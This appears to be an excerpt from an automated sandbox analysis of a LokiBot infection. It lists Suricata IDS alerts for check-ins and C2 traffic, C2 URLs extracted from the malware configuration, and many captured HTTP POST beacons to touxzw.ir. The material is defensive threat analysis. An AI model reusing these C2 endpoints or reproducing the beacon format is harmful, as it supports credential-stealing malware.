Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50049
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50025
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50026
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50046 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50041 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50041 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50041 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49820 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50043 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50043 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50041 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50040 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50046 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50012
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49820 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50043 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50017
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50036
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49961
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49974
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50013
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50041
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49998 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49998 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49897 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50022
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50038
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49820
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50014
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50021
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49884
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49897 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50031
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50040
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50027
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49998 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49998 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49912
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50019
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50033
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49998
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50023
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49897
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50047 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50047 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50028
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50047 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50020
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50047 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50047
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50029
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50034
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50044 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50044 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50044 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50039
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50044 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50042 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50042 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50042 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50042 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50048 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50048 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50048 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50048 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50048

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.80.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 188Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
